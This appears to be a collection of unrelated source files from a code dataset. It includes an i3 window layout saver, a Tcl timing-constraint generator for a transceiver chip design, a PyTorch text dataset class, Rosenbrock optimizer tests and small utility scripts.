return dict(proc_tree(get_tree()))
def proc_tree(x):
print(x['type'], len(x["nodes"]))
if x["type"] == "workspace":
return sum([proc_workspace(z, x["name"]) for z in x["nodes"]], [])
else:
return sum([proc_tree(z) for z in x["nodes"]], [])
def proc_workspace(x, ws):
if x["window"] is not None:
return [(x["name"], ws)]
else:
return sum([proc_workspace(z, ws) for z in x["nodes"]], [])
def ascii_only(s, r=''):
out = ''
skip = False
for i in range(len(s)):
if i < len(s)-1 and ord(s[i+1]) >= 128 and s[i] == "\\":
skip = True
out += r
continue
if skip:
skip = False
continue
if ord(s[i]) >= 128:
out += r
continue
out += s[i]
return out
def place_wins(wins):
cmd = "[title=\"{title}\"] move --no-auto-back-and-forth window to workspace number {ws}"
for t, n in wins.iteritems():
print(t, ascii_only(t))
print(re.escape(t))
print(ascii_only(re.escape(t)))
cmd_ = cmd.format(title=ascii_only(re.escape(t), r='.'), ws=n)
print("i3-msg '"+cmd_+"'")
# raw_input()
try:
subprocess.check_output([
"i3-msg",
cmd_
])
except Exception as e:# [subprocess.CalledProcessError, UnicodeEncodeError]:
print("ERROR: ", t, n)
print(e)
if __name__ == '__main__':
if sys.argv[1] == 'save':
wins = get_wins()
if len(sys.argv) > 2:
filename = sys.argv[2]
else:
filename = "wins_{}".format(int(time.time()))
with open(filename, 'w+') as out:
json.dump(wins, out)
elif sys.argv[1] == 'load':
with open(sys.argv[2], 'r') as wins_file:
wins = json.load(wins_file)
place_wins(wins)
#"[title=\"1966 - Google Chrome\"] move window to workspace number 13" | StarcoderdataPython |
147340 | #!/usr/bin/python3
import sys
sys.path.append('cpp')
import pyattyscomm
print("Searching for Attys")
s = pyattyscomm.AttysScan()
s.scan()
c = s.getAttysComm(0)
if (c == None):
print("No Attys found")
quit()
c.start()
while True:
while (not c.hasSampleAvailable()):
pass
sample = c.getSampleFromBuffer()
print(sample)
| StarcoderdataPython |
3272663 | <gh_stars>1-10
import csv
import json
input_path = 'data/timeline.csv'
output_path = '../data/timeline.json'
data = {}
data_list = []
years = []
with open(input_path, encoding="utf8") as cvsFile:
csvReader = csv.DictReader(cvsFile)
for row in csvReader:
print("--------")
data_list.insert(len(data_list),row)
if row["year"] not in years:
years.append(row["year"])
print(data_list)
print(data_list)
data["events"] = data_list
data["years"] = years
with open(output_path, 'w') as jsonFile:
jsonFile.write(json.dumps(data, indent=4)) | StarcoderdataPython |
3242017 | <gh_stars>10-100
import os
from pathlib import Path
OUTPUT_FILE = 'constraints.tcl'
design_name = os.environ['design_name']
time_scale = float(os.environ['constr_time_scale'])
cap_scale = float(os.environ['constr_cap_scale'])
main_per = float(os.environ['constr_main_per'])
clk_4x_per = 0.25*main_per*time_scale
output = ''
output += f'''
# Modified from ButterPHY and Garnet constraints
############
# Main clock
############
# Frequency is 1.4 GHz (40% above nominal)
# For timining analysis, the IO of analog core is considered to be clocked on
# ext_clk (input) rather than clk_adc (output). Hence the ext_clk signal is
# declared to have the same frequency as clk_adc. This should be OK because there
# is no synthesized logic that actually runs on ext_clk, and the ext_clk transition
# time is set to be very fast later in this constraints file.
create_clock -name clk_main_buf \\
-period {main_per*time_scale} \\
-waveform {{0 {0.5*main_per*time_scale}}} \\
[get_pin ibuf_main/clk]
create_clock -name clk_retimer \\
-period {main_per*time_scale} \\
-waveform {{0 {0.5*main_per*time_scale}}} \\
[get_pins iacore/clk_adc]
#################
# Input buffers #
#################
# ibuf_async
create_clock -name clk_async \\
-period {main_per*time_scale} \\
-waveform {{0 {0.5*main_per*time_scale}}} \\
[get_pins ibuf_async/clk]
# ibuf_main already covered above...
# ibuf_mdll_ref
create_clock -name clk_mdll_ref_p \\
-period {clk_4x_per} \\
-waveform {{0 {0.5*clk_4x_per}}} \\
[get_pins ibuf_mdll_ref/clk]
create_clock -name clk_mdll_ref_n \\
-period {clk_4x_per} \\
-waveform {{0 {0.5*clk_4x_per}}} \\
[get_pins ibuf_mdll_ref/clk_b]
# ibuf_mdll_mon
create_clock -name clk_mdll_mon_p \\
-period {main_per*time_scale} \\
-waveform {{0 {0.5*main_per*time_scale}}} \\
[get_pins ibuf_mdll_mon/clk]
create_clock -name clk_mdll_mon_n \\
-period {main_per*time_scale} \\
-waveform {{0 {0.5*main_per*time_scale}}} \\
[get_pins ibuf_mdll_mon/clk_b]
##############
# MDLL clock #
##############
create_clock -name clk_mdll \\
-period {clk_4x_per} \\
-waveform {{0 {0.5*clk_4x_per}}} \\
[get_pins minv_i/DOUT]
#############
# TX clocks #
#############
# Input divider
create_clock -name clk_tx_indiv \\
-period {clk_4x_per} \\
-waveform {{0 {0.5*clk_4x_per}}} \\
[get_pins itx/indiv/out]
# PI outputs
create_clock -name clk_tx_pi_0 \\
-period {clk_4x_per} \\
-waveform {{0 {0.5*clk_4x_per}}} \\
[get_pins itx/iPI[0].iPI/clk_out_slice]
create_clock -name clk_tx_pi_1 \\
-period {clk_4x_per} \\
-waveform {{{0.25*clk_4x_per} {0.75*clk_4x_per}}} \\
[get_pins itx/iPI[1].iPI/clk_out_slice]
create_clock -name clk_tx_pi_2 \\
-period {clk_4x_per} \\
-waveform {{{0.5*clk_4x_per} {clk_4x_per}}} \\
[get_pins itx/iPI[2].iPI/clk_out_slice]
create_clock -name clk_tx_pi_3 \\
-period {clk_4x_per} \\
-waveform {{{0.75*clk_4x_per} {1.25*clk_4x_per}}} \\
[get_pins itx/iPI[3].iPI/clk_out_slice]
# Half-rate and quarter-rate clocks
create_generated_clock -name clk_tx_hr \\
-source [get_pins itx/div0/clkin] \\
-divide_by 2 \\
[get_pins itx/div0/clkout]
create_generated_clock -name clk_tx_qr \\
-source [get_pins itx/div1/clkin] \\
-divide_by 2 \\
[get_pins itx/div1/clkout]
#####################
# clock uncertainty #
#####################
# clk_retimer
set_clock_uncertainty -setup 0.03 clk_retimer
set_clock_uncertainty -hold 0.03 clk_retimer
# clk_tx_pi
set_clock_uncertainty -setup 0.01 clk_tx_pi_0
set_clock_uncertainty -hold 0.01 clk_tx_pi_0
set_clock_uncertainty -setup 0.01 clk_tx_pi_1
set_clock_uncertainty -hold 0.01 clk_tx_pi_1
set_clock_uncertainty -setup 0.01 clk_tx_pi_2
set_clock_uncertainty -hold 0.01 clk_tx_pi_2
set_clock_uncertainty -setup 0.01 clk_tx_pi_3
set_clock_uncertainty -hold 0.01 clk_tx_pi_3
# half rate
set_clock_uncertainty -setup 0.02 clk_tx_hr
set_clock_uncertainty -hold 0.02 clk_tx_hr
# quarter rate
set_clock_uncertainty -setup 0.03 clk_tx_qr
set_clock_uncertainty -hold 0.03 clk_tx_qr
################
# JTAG interface
################
# These numbers come from looking at datasheets for JTAG cables
# https://www.analog.com/media/en/technical-documentation/application-notes/ee-68.pdf
# https://www2.lauterbach.com/pdf/arm_app_jtag.pdf
# TCK clock signal: 20 MHz max
create_clock -name clk_jtag -period 50.0 [get_ports jtag_intf_i.phy_tck]
set_clock_uncertainty -setup 0.03 clk_jtag
set_clock_uncertainty -hold 0.03 clk_jtag
# TCK constraints
set_input_transition 0.5 [get_port jtag_intf_i.phy_tck]
# timing constraints for TDI (changes 0 to 5 ns from falling edge of JTAG clock)
set_input_transition 0.5 [get_port jtag_intf_i.phy_tdi]
set_input_delay -clock clk_jtag -max 0.5 -clock_fall [get_port jtag_intf_i.phy_tdi]
set_input_delay -clock clk_jtag -min 0.0 -clock_fall [get_port jtag_intf_i.phy_tdi]
# timing constraints for TMS (changes 0 to 5 ns from falling edge of JTAG clock)
set_input_transition 0.5 [get_port jtag_intf_i.phy_tms]
set_input_delay -clock clk_jtag -max 5.0 -clock_fall [get_port jtag_intf_i.phy_tms]
set_input_delay -clock clk_jtag -min 0.0 -clock_fall [get_port jtag_intf_i.phy_tms]
# timing constraints for TDO (setup time 12.5 ns, hold time 0.0)
# TDO changes on the falling edge of TCK but is sampled on the rising edge
set_output_delay -clock clk_jtag -max 12.5 [get_port jtag_intf_i.phy_tdo]
set_output_delay -clock clk_jtag -min 0.0 [get_port jtag_intf_i.phy_tdo]
# TRST_N is asynchronous
set_input_transition 0.5 [get_port jtag_intf_i.phy_trst_n]
############################
# Asynchronous clock domains
############################
set_clock_groups -asynchronous \\
-group {{ clk_jtag }} \\
-group {{ \\
clk_tx_pi_0 \\
clk_tx_pi_1 \\
clk_tx_pi_2 \\
clk_tx_pi_3 \\
clk_tx_hr \\
clk_tx_qr \\
}} \\
-group {{ clk_retimer clk_main_buf }} \\
-group {{ clk_async }} \\
-group {{ clk_mdll_ref_p clk_mdll_ref_n }} \\
-group {{ clk_mdll_mon_p clk_mdll_mon_n }} \\
-group {{ clk_mdll }} \\
-group {{ clk_tx_indiv }}
####################
# Other external I/O
####################
# external analog inputs
set ext_dont_touch_false_path {{ \\
ext_rx_inp \\
ext_rx_inn \\
ext_Vcm \\
ext_Vcal \\
ext_rx_inp_test \\
ext_rx_inn_test \\
ext_tx_outp \\
ext_tx_outn \\
ext_clk_async_p \\
ext_clk_async_n \\
ext_clkp \\
ext_clkn \\
ext_mdll_clk_refp \\
ext_mdll_clk_refn \\
ext_mdll_clk_monp \\
ext_mdll_clk_monn \\
clk_out_p \\
clk_out_n \\
clk_trig_p \\
clk_trig_n \\
}}
set_dont_touch_network [get_ports $ext_dont_touch_false_path]
set_false_path -through [get_ports $ext_dont_touch_false_path]
set ext_false_path_only {{ \\
ext_rstb \\
ext_dump_start \\
clk_cgra \\
ramp_clock \\
freq_lvl_cross \\
}}
set_false_path -through [get_ports $ext_false_path_only]
###################
# Top-level buffers
###################
# IOs are all false paths
set_false_path -through [get_pins ibuf_*/*]
# Input buffer inputs (which are external pins)
# should not have buffers added
set_dont_touch_network [get_pins ibuf_*/in*]
#############
# Analog core
#############
# Debugging signals are all false paths
set_false_path -through [get_pins iacore/adbg_intf_i.*]
# Clock outputs in the debug interface should not have buffers added
set adbg_clk_pins [get_pins {{ \\
iacore/adbg_intf_i.del_out_pi \\
iacore/adbg_intf_i.pi_out_meas* \\
iacore/adbg_intf_i.del_out_rep* \\
iacore/adbg_intf_i.inbuf_out_meas \\
}}]
#############
# Transmitter
#############
# Debugging signals are all false paths
set_false_path -through [get_pins itx/tx.*]
# Clock outputs in the debug interface should not have buffers added
set tdbg_clk_pins [get_pins {{ \\
itx/*del_out_pi* \\
itx/*pi_out_meas* \\
itx/*inbuf_out_meas* \\
}}]
set_dont_touch_network $tdbg_clk_pins
# TODO: do we need to set dont_touch through the hierarchy?
# Or will it be applied automatically to instances within?
# Phase interpolators
for {{set i 0}} {{$i < 4}} {{incr i}} {{
set_dont_touch [get_cells "itx/iPI[$i].iPI"]
}}
# Input divider
set_dont_touch [get_cells itx/indiv]
# Internal nets
set_dont_touch [get_nets "itx/qr_data_p"]
set_dont_touch [get_nets "itx/qr_data_n"]
set_dont_touch [get_nets "itx/mtb_n"]
set_dont_touch [get_nets "itx/mtb_p"]
# Muxes
for {{set i 0}} {{$i < 2}} {{incr i}} {{
# Half-rate muxes (the mux is intentionally left out because
# there is a mapping problem for FreePDK45
for {{set j 1}} {{$j < 5}} {{incr j}} {{
set_dont_touch [get_nets "itx/hr_mux_16t4_$i/iMUX[$j].mux_4t1/hd"]
# multipath constraint from quarter-rate to half-rate muxes
for {{set k 0}} {{$k < 2}} {{incr k}} {{
set_multicycle_path \\
1 \\
-setup \\
-end \\
-from [get_pins "itx/hr_mux_16t4_$i/iMUX[$j].mux_4t1/hr_2t1_mux_$k/mux_0/sel"] \\
-to [get_pins "itx/hr_mux_16t4_$i/iMUX[$j].mux_4t1/hr_2t1_mux_2/dff_$k/D"]
set_multicycle_path \\
0 \\
-hold \\
-end \\
-from [get_pins "itx/hr_mux_16t4_$i/iMUX[$j].mux_4t1/hr_2t1_mux_$k/mux_0/sel"] \\
-to [get_pins "itx/hr_mux_16t4_$i/iMUX[$j].mux_4t1/hr_2t1_mux_2/dff_$k/D"]
}}
# dont_touch nets within each 2t1 mux
for {{set k 0}} {{$k < 3}} {{incr k}} {{
set_dont_touch [get_nets "itx/hr_mux_16t4_$i/iMUX[$j].mux_4t1/hr_2t1_mux_$k/D0L"]
set_dont_touch [get_nets "itx/hr_mux_16t4_$i/iMUX[$j].mux_4t1/hr_2t1_mux_$k/D1M"]
}}
}}
# Quarter-rate muxes
set_dont_touch [get_nets "itx/qr_mux_4t1_$i/D0DQ"]
set_dont_touch [get_nets "itx/qr_mux_4t1_$i/D0DI"]
set_dont_touch [get_nets "itx/qr_mux_4t1_$i/D0DQB"]
set_dont_touch [get_nets "itx/qr_mux_4t1_$i/D1DQB"]
set_dont_touch [get_nets "itx/qr_mux_4t1_$i/D0DIB"]
set_dont_touch [get_nets "itx/qr_mux_4t1_$i/D1DIB"]
set_dont_touch [get_nets "itx/qr_mux_4t1_$i/mux_out"]
####################
# Multicycle paths #
####################
# all are launched on clk_tx_hr, which is
# divided by two from clk_tx_pi_2 (QB)
# din[0]: captured on I @ dff_IB0
set_multicycle_path \\
1 \\
-setup \\
-end \\
-from [get_pins "itx/hr_mux_16t4_$i/iMUX[1].mux_4t1/hr_2t1_mux_2/mux_0/sel"] \\
-to [get_pins "itx/qr_mux_4t1_$i/dff_IB0/D"]
set_multicycle_path \\
0 \\
-hold \\
-end \\
-from [get_pins "itx/hr_mux_16t4_$i/iMUX[1].mux_4t1/hr_2t1_mux_2/mux_0/sel"] \\
-to [get_pins "itx/qr_mux_4t1_$i/dff_IB0/D"]
# din[1]: captured on Q @ dff_QB0
set_multicycle_path \\
1 \\
-setup \\
-end \\
-from [get_pins "itx/hr_mux_16t4_$i/iMUX[2].mux_4t1/hr_2t1_mux_2/mux_0/sel"] \\
-to [get_pins "itx/qr_mux_4t1_$i/dff_QB0/D"]
set_multicycle_path \\
0 \\
-hold \\
-end \\
-from [get_pins "itx/hr_mux_16t4_$i/iMUX[2].mux_4t1/hr_2t1_mux_2/mux_0/sel"] \\
-to [get_pins "itx/qr_mux_4t1_$i/dff_QB0/D"]
# din[2]: captured on I @ dff_I0
set_multicycle_path \\
1 \\
-setup \\
-end \\
-from [get_pins "itx/hr_mux_16t4_$i/iMUX[3].mux_4t1/hr_2t1_mux_2/mux_0/sel"] \\
-to [get_pins "itx/qr_mux_4t1_$i/dff_I0/D"]
set_multicycle_path \\
0 \\
-hold \\
-end \\
-from [get_pins "itx/hr_mux_16t4_$i/iMUX[3].mux_4t1/hr_2t1_mux_2/mux_0/sel"] \\
-to [get_pins "itx/qr_mux_4t1_$i/dff_I0/D"]
# din[3]: captured on Q @ dff_Q0
set_multicycle_path \\
1 \\
-setup \\
-end \\
-from [get_pins "itx/hr_mux_16t4_$i/iMUX[4].mux_4t1/hr_2t1_mux_2/mux_0/sel"] \\
-to [get_pins "itx/qr_mux_4t1_$i/dff_Q0/D"]
set_multicycle_path \\
0 \\
-hold \\
-end \\
-from [get_pins "itx/hr_mux_16t4_$i/iMUX[4].mux_4t1/hr_2t1_mux_2/mux_0/sel"] \\
-to [get_pins "itx/qr_mux_4t1_$i/dff_Q0/D"]
'''
if os.environ['adk_name'] == 'tsmc16':
output += f'''
set_dont_touch [get_cells "itx/qr_mux_4t1_$i/mux_4/mux_4_fixed"]
'''
output += f'''
for {{set j 0}} {{$j < 4}} {{incr j}} {{
set_dont_touch [get_cells "itx/qr_mux_4t1_$i/i_INVBUF[$j].inv_buf/inv_4_fixed"]
}}
}}
# Output buffer
for {{set i 0}} {{$i < 2}} {{incr i}} {{
set_dont_touch [get_cells "itx/buf1/iBUF[$i].i_tri_buf_n/tri_buf"]
set_dont_touch [get_cells "itx/buf1/iBUF[$i].i_tri_buf_p/tri_buf"]
set_false_path -through [get_pins -of_objects "itx/buf1/iBUF[$i].i_tri_buf_n/tri_buf"]
set_false_path -through [get_pins -of_objects "itx/buf1/iBUF[$i].i_tri_buf_p/tri_buf"]
}}
set_dont_touch [get_nets "itx/buf1/BTN"]
set_dont_touch [get_nets "itx/buf1/BTP"]
set_dont_touch [get_cells "itx/buf1/i_term_n"]
set_dont_touch [get_cells "itx/buf1/i_term_p"]
# Make sure termination resistor is wired up
set_dont_touch [get_pins "itx/buf1/DOUTP"]
set_dont_touch [get_pins "itx/buf1/DOUTN"]
set_dont_touch [get_pins "itx/dout_p"]
set_dont_touch [get_pins "itx/dout_n"]
# Set a false path on the termination resistors to avoid
# a combinational loop error
set_false_path -through [get_pins -of_objects "itx/buf1/i_term_n"]
set_false_path -through [get_pins -of_objects "itx/buf1/i_term_p"]
# Make sure the transmitter is not retimed. This may already be in
# the main DC step, but it's not clear that it's being applied.
set_dont_retime [get_cells itx]
######
# MDLL
######
# IOs for MDLL are all false paths
set_false_path -through [get_pins -of_objects imdll]
# Unused clock IOs should not have buffers added
set_dont_touch_network [get_pins imdll/clk_0]
'''
if os.environ['adk_name'] == 'tsmc16':
output += f'''
set_dont_touch [get_cells "minv_i/inv_1_fixed"]
'''
output += f'''
set_dont_touch_network [get_pins imdll/clk_90]
set_dont_touch_network [get_pins imdll/clk_180]
set_dont_touch_network [get_pins imdll/clk_270]
################
# Output buffer
################
# IOs for output buffers are all false paths
set_false_path -through [get_pins -of_objects idcore/out_buff_i]
# Clock outputs should not have buffers added
set_dont_touch_network [get_pins idcore/out_buff_i/clock_out_*]
set_dont_touch_network [get_pins idcore/out_buff_i/trigg_out_*]
#################
# Net constraints
#################
# specify defaults for all nets
set_driving_cell -no_design_rule -lib_cell $ADK_DRIVING_CELL [all_inputs]
set_max_transition {0.2*time_scale} [current_design]
set_max_capacitance {0.1*cap_scale} [current_design]
set_max_fanout 20 {design_name}
# specify loads for outputs
set_load {0.1*cap_scale} [all_outputs]
# change the max capacitance for ext_Vcal only
# it's inout, so the previous "set_load"
# command appears to apply to it as well
set_max_capacitance {1.0*cap_scale} [get_port ext_Vcal]
# Tighten transition constraint for clocks declared so far
set_max_transition {0.1*time_scale} -clock_path [get_clock clk_jtag]
set_max_transition {0.1*time_scale} -clock_path [get_clock clk_retimer]
set_max_transition {0.025*time_scale} -clock_path [get_clock clk_tx_indiv]
set_max_transition {0.025*time_scale} -clock_path [get_clock clk_tx_pi_0]
set_max_transition {0.025*time_scale} -clock_path [get_clock clk_tx_pi_1]
set_max_transition {0.025*time_scale} -clock_path [get_clock clk_tx_pi_2]
set_max_transition {0.025*time_scale} -clock_path [get_clock clk_tx_pi_3]
set_max_transition {0.05*time_scale} -clock_path [get_clock clk_tx_hr]
set_max_transition {0.1*time_scale} -clock_path [get_clock clk_tx_qr]
# Set transition time for high-speed signals monitored from iacore
# The transition time is 10% of a 4 GHz period.
set adbg_count 0
foreach x [get_object_name $adbg_clk_pins] {{
create_clock -name "clk_mon_net_$adbg_count" -period {0.25*time_scale} [get_pin $x]
set_max_transition {0.025*time_scale} -clock_path [get_clock "clk_mon_net_$adbg_count"]
incr adbg_count
}}
###################################
# Set transition times at top-level
###################################
# clk_async
set_max_transition {0.1*time_scale} -clock_path [get_clock clk_async]
# clk_main - cant be lower than 0.017!
set_max_transition {0.017*time_scale} -clock_path [get_clock clk_main_buf]
# MDLL reference
set_max_transition {0.025*time_scale} -clock_path [get_clock clk_mdll_ref_p]
set_max_transition {0.025*time_scale} -clock_path [get_clock clk_mdll_ref_n]
# MDLL monitor
set_max_transition {0.1*time_scale} -clock_path [get_clock clk_mdll_mon_p]
set_max_transition {0.1*time_scale} -clock_path [get_clock clk_mdll_mon_n]
# MDLL output
set_max_transition {0.025*time_scale} -clock_path [get_clock clk_mdll]
# Clock going to the CGRA
set_max_transition {0.1*time_scale} [get_pin idcore/clk_cgra]
#########################################
# Set transition times in the transmitter
#########################################
# Mux +
set_max_transition {0.025*time_scale} [get_pin {{itx/qr_mux_4t1_0/din[0]}}]
set_max_transition {0.025*time_scale} [get_pin {{itx/qr_mux_4t1_0/din[1]}}]
set_max_transition {0.025*time_scale} [get_pin {{itx/qr_mux_4t1_0/din[2]}}]
set_max_transition {0.025*time_scale} [get_pin {{itx/qr_mux_4t1_0/din[3]}}]
set_max_transition {0.008*time_scale} [get_pin {{itx/qr_mux_4t1_0/data}}]
# Mux -
set_max_transition {0.025*time_scale} [get_pin {{itx/qr_mux_4t1_1/din[0]}}]
set_max_transition {0.025*time_scale} [get_pin {{itx/qr_mux_4t1_1/din[1]}}]
set_max_transition {0.025*time_scale} [get_pin {{itx/qr_mux_4t1_1/din[2]}}]
set_max_transition {0.025*time_scale} [get_pin {{itx/qr_mux_4t1_1/din[3]}}]
set_max_transition {0.008*time_scale} [get_pin {{itx/qr_mux_4t1_1/data}}]
echo [all_clocks]
'''
# process-specific constraints
if os.environ['adk_name'] == 'tsmc16':
output += f'''
# From ButterPHY
# TODO: what is mvt_target_libs?
# foreach lib $mvt_target_libs {{
# set_dont_use [file rootname [file tail $lib]]/*D0BWP*
# }}
# From Garnet
# Apparently ANAIOPAD and IOPAD cells don't all have the dont_touch property
# As a result, set the property here if there are any such cells
if {{[llength [get_cells ANAIOPAD*]] > 0}} {{
set_dont_touch [get_cells ANAIOPAD*]
}}
if {{[llength [get_cells IOPAD*]] > 0}} {{
set_dont_touch [get_cells IOPAD*]
}}
'''
# create output directory
OUTPUT_DIR = Path('outputs')
OUTPUT_DIR.mkdir(exist_ok=True, parents=True)
# write output text
with open(OUTPUT_DIR / OUTPUT_FILE, 'w') as f:
f.write(output)
| StarcoderdataPython |
3280682 | from pathlib import Path
from typing import List
import numpy as np
import torch
from tokenizers import Tokenizer
from torch.utils.data import Dataset
from tqdm import tqdm
class TextDataset(Dataset):
def __init__(self, text_files: List[Path], tokenizer_path: str, sequence_length: int = 128, stride: int = 128, pretokenized: bool = False):
"""
A class that holds a basic text dataset in memory in tokenized form, along with the tokenizer
:param text_files: list of paths to the various text files/documents to use as data
:param tokenizer_path: path to huggingface Tokenizers json
:param sequence_length: length of sequences to return
:param stride: gap between sequences
"""
super().__init__()
self.tokenizer = Tokenizer.from_file(tokenizer_path)
self.text_files = text_files
if stride == 0:
raise ValueError("Stride must be >= 1, otherwise the same piece of data will be repeated infinite times")
self.encoded_tokens = []
self.n_tokens_windows = np.zeros(len(text_files), dtype=np.uint32)
self.length = 0
self.sequence_length = sequence_length
self.stride = stride
total_tokens = 0
for i, file in enumerate(tqdm(text_files)):
if not pretokenized:
with open(file, 'r', encoding='utf-8') as reader:
text = reader.read()
# add SOS and EOS tokens to each document
text = "<SOS>" + text + "<EOS>"
# encode into tokens
ids = self.tokenizer.encode(text).ids
else:
ids = np.load(file, mmap_mode='r+')
ids = ids.f.arr_0
ids = ids.astype(np.int16)
# store tokens
self.encoded_tokens.append(ids)
total_tokens += len(ids)
# store number of possible windows for this file, this is for presenting multiple files as one whole
# subtract 1 window, for cases of small stride (e.g. stride=1)
n_windows = ((len(ids) - sequence_length) // stride)
self.n_tokens_windows[i] = n_windows
self.length += n_windows
print("Loaded dataset of", total_tokens, "tokens")
def __len__(self) -> int:
return self.length
def __getitem__(self, index: int) -> torch.LongTensor:
for idx, n_windows in enumerate(self.n_tokens_windows):
if index < n_windows: # the index is within this window if it is less than the n_windows
token_idx = index * self.stride
return torch.LongTensor(self.encoded_tokens[idx][token_idx:token_idx + self.sequence_length])
else:
index -= n_windows # subtract this windowing, move to the next
def decode(self, ids: List[int]) -> str:
return self.tokenizer.decode(ids)
| StarcoderdataPython |
3383237 | <reponame>yuanz271/PyDSTool<gh_stars>1-10
#!/usr/bin/env python
# <NAME>
# Last Change : 2007-08-24 10:59
"""
Class defining the Rosenbrock function
"""
from __future__ import absolute_import
import numpy
from numpy.testing import assert_almost_equal, assert_array_almost_equal
from PyDSTool.Toolbox.optimizers import criterion, step, optimizer, line_search
class Rosenbrock:
"""
The Rosenbrock function
"""
def __init__(self, dimension):
"""
Constructor
"""
self.dimension = dimension
def __call__(self, x):
"""
Get the value of the Rosenbrock function at a specific point
"""
return numpy.sum(100.0 * (x[1:] - x[:-1]**2.0)**2.0 + (1. - x[:-1])**2.0)
def gradient(self, x):
"""
Evaluates the gradient of the function
"""
xm = x[1:-1]
xm_m1 = x[:-2]
xm_p1 = x[2:]
der = numpy.zeros(x.shape, x.dtype)
der[1:-1] = 200. * (xm - xm_m1**2.) - 400. * (xm_p1 - xm**2.) * xm - 2. * (1. - xm)
der[0] = -400. * x[0] * (x[1] - x[0]**2.) - 2. * (1. - x[0])
der[-1] = 200. * (x[-1] - x[-2]**2.)
return der
def hessian(self, x):
"""
Evaluates the gradient of the function
"""
H = numpy.diag(-400. * x[:-1], 1) - numpy.diag(400. * x[:-1],-1)
diagonal = numpy.zeros(len(x), x.dtype)
diagonal[0] = 1200. * x[0]**2. - 400. * x[1] + 2.
diagonal[-1] = 200.
diagonal[1:-1] = 202. + 1200. * x[1:-1]**2. - 400. * x[2:]
H += numpy.diag(diagonal)
return H
def test_simple_gradient_monotony():
startPoint = numpy.empty(2, numpy.float)
startPoint[0] = -1.01
startPoint[-1] = 1.01
optimi = optimizer.StandardOptimizer(function = Rosenbrock(2), step = step.GradientStep(), criterion = criterion.OrComposition(criterion.MonotonyCriterion(0.00001), criterion.IterationCriterion(10000)), x0 = startPoint, line_search = line_search.SimpleLineSearch(alpha_step = 0.001))
assert_almost_equal(optimi.optimize(), numpy.ones(2, numpy.float), decimal=1)
def test_simple_gradient_relative():
startPoint = numpy.empty(2, numpy.float)
startPoint[0] = -1.01
startPoint[-1] = 1.01
optimi = optimizer.StandardOptimizer(function = Rosenbrock(2), step = step.GradientStep(), criterion = criterion.RelativeValueCriterion(0.00001), x0 = startPoint, line_search = line_search.SimpleLineSearch(alpha_step = 0.001))
assert_almost_equal(optimi.optimize(), numpy.ones(2, numpy.float), decimal=1)
def test_simple_newton_relative():
startPoint = numpy.empty(2, numpy.float)
startPoint[0] = -1.01
startPoint[-1] = 1.01
optimi = optimizer.StandardOptimizer(function = Rosenbrock(2), step = step.NewtonStep(), criterion = criterion.RelativeValueCriterion(0.00001), x0 = startPoint, line_search = line_search.SimpleLineSearch())
assert_almost_equal(optimi.optimize(), numpy.ones(2, numpy.float))
def test_wpr_cwgradient():
startPoint = numpy.empty(2, numpy.float)
startPoint[0] = -1.01
startPoint[-1] = 1.01
optimi = optimizer.StandardOptimizer(function = Rosenbrock(2), step = step.CWConjugateGradientStep(), criterion = criterion.criterion(iterations_max = 1000, ftol = 0.00000001, gtol = 0.0001), x0 = startPoint, line_search = line_search.WolfePowellRule())
assert_array_almost_equal(optimi.optimize(), numpy.ones(2, numpy.float))
def test_swpr_dygradient():
startPoint = numpy.empty(2, numpy.float)
startPoint[0] = -1.01
startPoint[-1] = 1.01
optimi = optimizer.StandardOptimizer(function = Rosenbrock(2), step = step.DYConjugateGradientStep(), criterion = criterion.criterion(iterations_max = 1000, ftol = 0.00000001, gtol = 0.0001), x0 = startPoint, line_search = line_search.StrongWolfePowellRule())
assert_array_almost_equal(optimi.optimize(), numpy.ones(2, numpy.float), decimal = 4)
| StarcoderdataPython |
4813579 | <filename>wrapper/__main__.py
import sys
import io
import argparse
from wrapper import pipeline
import logging
logger = logging.getLogger(__name__)
parser = argparse.ArgumentParser(description='VU Reading Machine pipeline')
parser.add_argument('-c', '--cfg_file', dest='cfg_file', default='./cfg/pipeline.yml', type=str, help='config file')
parser.add_argument('-d', '--bin_dir', dest='bin_dir', default='./scripts/bin/', type=str, help='component scripts directory')
parser.add_argument('-i', '--in_layers', dest='in_layers_str', type=str, help='input layers and their prerequisite components are filtered out (comma-separated list string)')
parser.add_argument('-o', '--out_layers', dest='out_layers_str', type=str, help='only runs the components needed to produce the given output layers (comma-separated list string)')
parser.add_argument('-e', '--exclude_components', dest='exclude_components_str', type=str, help='excludes components from the pipeline (comma-separated list string)')
parser.add_argument('-l', '--log_file', dest='log_file', type=str, help='log file')
parser.add_argument('-s', '--component_args', dest='component_args', type=str, help='component arguments string')
args = parser.parse_args()
logging.basicConfig(format='%(message)s',
filename=args.log_file,
filemode='w',
level=logging.INFO)
cfg_file = args.cfg_file
bin_dir = args.bin_dir
input_layers = []
if args.in_layers_str is not None:
input_layers = args.in_layers_str.split(',')
output_layers = []
if args.out_layers_str is not None:
output_layers = args.out_layers_str.split(',')
exclude_components = []
if args.exclude_components_str is not None:
exclude_components = args.exclude_components_str.split(',')
subargs = {}
if args.component_args is not None:
for argv in args.component_args.split(';'):
mod_name, opt_name, opt_val = argv.split(':')
subargs[mod_name] = '{} {}'.format(opt_name, opt_val)
try:
p = pipeline.create_pipeline(cfg_file, in_layers=input_layers, goal_layers=output_layers, excepted_components=exclude_components, bindir=bin_dir, subargs=subargs)
input_file = sys.stdin
p.execute(input_file)
except ValueError as e:
logger.error(e)
| StarcoderdataPython |
18024 | <filename>DTL_tests/unittests/test_api.py
import os
import time
import unittest
from DTL.api import *
class TestCaseApiUtils(unittest.TestCase):
def setUp(self):
apiUtils.synthesize(self, 'mySynthesizeVar', None)
self.bit = apiUtils.BitTracker.getBit(self)
def test_wildcardToRe(self):
self.assertEquals(apiUtils.wildcardToRe('c:\CIG\main\*.*'),
'(?i)c\\:\\\\CIG\\\\main\\\\[^\\\\]*\\.[^\\\\]*$')
self.assertEquals(apiUtils.wildcardToRe('c:\CIG\main\*.*'),
apiUtils.wildcardToRe('c:/CIG/main/*.*'))
def test_synthesize(self):
self.assertIn('_mySynthesizeVar', self.__dict__)
self.assertTrue(hasattr(self, 'mySynthesizeVar'))
self.assertTrue(hasattr(self, 'getMySynthesizeVar'))
self.assertTrue(hasattr(self, 'setMySynthesizeVar'))
self.assertEqual(self.getMySynthesizeVar(), self.mySynthesizeVar)
def test_getClassName(self):
self.assertEqual(apiUtils.getClassName(self), 'TestCaseApiUtils')
def test_bittracker(self):
self.assertEqual(apiUtils.BitTracker.getBit(self), self.bit)
class TestCaseDotifyDict(unittest.TestCase):
def setUp(self):
self.dotifydict = DotifyDict({'one':{'two':{'three':'value'}}})
